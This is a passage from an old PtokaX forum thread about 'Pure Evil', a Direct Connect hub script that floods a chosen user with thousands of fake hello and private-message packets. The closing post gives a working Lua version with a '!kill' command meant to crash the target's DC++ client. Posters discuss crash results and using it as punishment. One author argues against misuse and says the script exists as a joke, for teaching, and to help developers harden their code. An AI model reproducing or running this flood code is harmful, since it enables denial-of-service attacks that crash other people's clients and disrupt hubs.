Pure Evil By Phatty - Page 2
 

News:

29 December 2022 - PtokaX 0.5.3.0 (20th anniversary edition) released...
11 April 2017 - PtokaX 0.5.2.2 released...
8 April 2015 Anti child and anti pedo pr0n scripts are not allowed anymore on this board!
28 September 2015 - PtokaX 0.5.2.1 for Windows 10 IoT released...
3 September 2015 - PtokaX 0.5.2.1 released...
16 August 2015 - PtokaX 0.5.2.0 released...
1 August 2015 - Crowdfunding for ADC protocol support in PtokaX ended. Clearly nobody want ADC support...
30 June 2015 - PtokaX 0.5.1.0 released...
30 April 2015 Crowdfunding for ADC protocol support in PtokaX
26 April 2015 New support hub!
20 February 2015 - PtokaX 0.5.0.3 released...
13 April 2014 - PtokaX 0.5.0.2 released...
23 March 2014 - PtokaX testing version 0.5.0.1 build 454 is available.
04 March 2014 - PtokaX.org sites were temporary down because of DDOS attacks and issues with hosting service provider.

Main Menu

Pure Evil By Phatty

Started by pHaTTy, 13 December, 2003, 05:24:15

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

pHaTTy

QuoteOriginally posted by NotRabidWombat
With every test I performed DC crashed. There was one instance that an XP machine crashed when the flooding finished...

-NotRabidWombat


hehehe now that wud be phun hahah :))
Resistance is futile!

pHaTTy

btw sending 2 hellos at once is more violent ;)
Resistance is futile!

NotRabidWombat

... Why? you shouldn't be able to get duplicates in the user list.

-NotRabidWombat


I like childish behavior. Maybe this post will be deleted next.

c h i l l a

the client only goes down when...  pop up pm's is enabled.

else i know around 1000 PM's it enough, for dc.

pHaTTy

QuoteOriginally posted by NotRabidWombat
... Why? you shouldn't be able to get duplicates in the user list.

-NotRabidWombat

muliple hellos from mutli users at the same time ;)
Resistance is futile!

oblivion

(.UTH-UK.)-evilBot=-> duru Was flooded with 170800 messages.. Attacked with an Ultimate Fireball of intensity.



ahha


guyz i was thinking is it possible to make the ultimate nasty bot...for such things users sharing sick files
bring him out when we most need to get our revenge
on the sicko's


floods user .then after lifebans ...possible?
.:::\'][\'  r  ?  ?  ?  ?    :: ][  ?  ?  ?  r  ?  ?  r  ?  \'][\'  ?  ?::::.    



hub address::     oblivion.servebeer.com


the hub

NotRabidWombat

#31
oh now I see...

actually chilla, I tested the hello messaging attack (adding lots of users to the list) and it also crashed DC++. Took a bit longer but still worked.

oblivion,

don't go overboard. I did the first version as a joke for some people. Flooding people is just as bad as someone flooding the hub. It CAN get you kicked from your ISP. Besides, that's the way you make enemies. Just ban them, problem solved.

-NotRabidWombat


I like childish behavior. Maybe this post will be deleted next.

nErBoS

#32
Hi,

The script is great for fakers, but if in the DCs Settings the user in the Advanced disable the option "Popup private messages" the script won't have any effect :(

Can it be solved ????

Best regards, nErBoS
--## nErBoS Spot ##--

Pedro

very nice, anychance we can have it work on an ip aswell


Just a thot  :)
if it aint broke, open it up and find out why...

NotRabidWombat

NO. This was intended as a joke and should not be used for actual punishment. Grow up.

-NotRabidWombat


I like childish behavior. Maybe this post will be deleted next.

Pedro

didnt mean to offend ya m8, but like the atomic bomb, it was made to see if it could be done then used, why include flooders in main scripts if they are not to be used.(mean machine, nxs)

If someone makes it, someone will use it, guarenteed.

If ya dont want it used why make it.??

would be best to have moderator remove this thread if you made it not to be used..

and I dont mean to upset you with this post, I just try to understand..

Thanx for the reply tho m8

HAPPY DAYS
if it aint broke, open it up and find out why...

NotRabidWombat

1) A flooding script is FAR more counter productive than productive
   a) Uses hubs outgoing bandwidth directly impacting chat/search/ConnectToMe
   b) Flooding a user to the point of crashing will probably UPSET them. Just kick/ban.
   c) Flooding a user is the equivalent of attacking a hub. If you feel it is justified, then I feel users who are upset by your hub or operators are justified to attack/flood it.

2) Just because you have power does not mean you should abuse it. I think we've all seen enough kung-fu and end of the world movies to know that one by know.

3) I made this script for these purpose:
   a) A joke for some of my buddies on my LAN. We do it to each other. No one gets angry.
   b) To learn and teach. That is the purpose of a forum. To spread ideas and help each other.
   c) To show developers (hub and client) how this can be done to give them an idea on how to stop and make better code.

Any other questions?

-NotRabidWombat


I like childish behavior. Maybe this post will be deleted next.

Pedro

I bow down before you and and apologise for my supidity..

I never thot about it being used as a teaching tool so that others may learn how to defend against it and to also show how code could be written.(probably all other points you put acroos)

I should also learn to think before I speak.

My humble apologies m8.
if it aint broke, open it up and find out why...

NotRabidWombat

Sorry man. I'm not looking for apologies. I just want Direct Connect to be a nicer place, even if I'm a big loud - mouthed jerk about it.

-NotRabidWombat


I like childish behavior. Maybe this post will be deleted next.

pHaTTy

hmmm save lots of random stuff

--//Function PureEvil v1.2 by Phatty

function Main() BOT = "Verli"; end;

function DataArrival(user,data)
	if( strsub(data, 1, 1) == "<" ) then
		local data=strsub(data,1,strlen(data)-1) 
		local s,e,cmd = strfind(data, "%b<>%s+(%S+)")

		if cmd == "!kill" then
			local s,e,name = strfind(data, "%b<>%s+%S+%s+(%S+)")
			local ls = GetItemByName(name)
			if ls then local t = 0;
				repeat ls:SendData( "$Hello "..user.sName..t )
				ls:SendData( "$To: "..user.sName.." From: "..user.sName..t.." $<"..user.sName..t.."> test|")
				if GetItemByName(name) == nil then
					SendToAll(BOT,name.."'s client has just been terminated with "..t.." open pm windows")
				t = 0; return nil; end; t = t+1;
				until t == 10000; else user:SendData(BOT,"No such user!")
			return 1; end;
		end;
	end;
end;

this is way done in gekko

this way does kill the client, there client will close, even closes dc stealth, but it will freeze the hub for few hundred milisecs
Resistance is futile!

SMF spam blocked by CleanTalk